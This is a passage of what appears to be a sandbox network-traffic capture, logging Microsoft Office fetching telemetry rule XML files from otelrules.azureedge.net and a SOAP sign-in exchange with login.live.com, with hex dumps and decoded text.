                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    65192.168.2.44981313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:14 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 420
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                    x-ms-request-id: 09e3fb4a-a01e-006f-48a1-4213cd000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103514Z-174f78459684db9fhC1EWRc7g400000001cg0000000020b3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:14 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    66192.168.2.44981513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:14 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:15 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                    x-ms-request-id: feaf0f62-e01e-0071-4f14-4208e7000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103514Z-174f7845968vqt9xhC1EWRgten00000011cg000000003axp
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    67192.168.2.44981440.126.53.19443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:14 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/soap+xml
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                    Content-Length: 4775
                                                                                                                    Host: login.live.com
                                                                                                                    2024-11-30 10:35:14 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                    2024-11-30 10:35:15 UTC569INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                    Expires: Sat, 30 Nov 2024 10:34:15 GMT
                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    x-ms-route-info: C532_SN1
                                                                                                                    x-ms-request-id: 52a4ba69-d840-4049-87fb-8da705bf0518
                                                                                                                    PPServer: PPV: 30 H: SN1PEPF0002F133 V: 0
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:14 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 11410
                                                                                                                    2024-11-30 10:35:15 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    68192.168.2.44981613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:16 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                    x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103516Z-174f7845968vqt9xhC1EWRgten00000011c0000000003zmy
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    69192.168.2.44981713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:16 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:17 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                    x-ms-request-id: 390b1506-101e-0017-0101-4247c7000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103516Z-174f7845968xlwnmhC1EWR0sv80000001140000000004w2u
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:17 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    70192.168.2.44981813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:16 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:17 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 423
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                    x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103516Z-174f7845968ljs8phC1EWRe6en00000011800000000012hf
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:17 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    71192.168.2.44981913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:16 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:17 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:17 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 478
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                    x-ms-request-id: 691215a9-b01e-0084-78b4-42d736000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103517Z-174f7845968frfdmhC1EWRxxbw00000011dg000000002ea6
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:17 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    72192.168.2.44982013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:16 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:17 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:17 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 404
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                    x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103517Z-174f7845968frfdmhC1EWRxxbw00000011f0000000000bt6
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:17 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    73192.168.2.44982213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:18 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                    x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103518Z-174f78459688l8rvhC1EWRtzr00000000dvg0000000068d9
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    74192.168.2.44982313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:18 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:19 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:19 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 400
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                    x-ms-request-id: 203bed18-201e-006e-51a9-42bbe3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103519Z-174f7845968zgtf6hC1EWRqd8s0000000u7g0000000065q3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
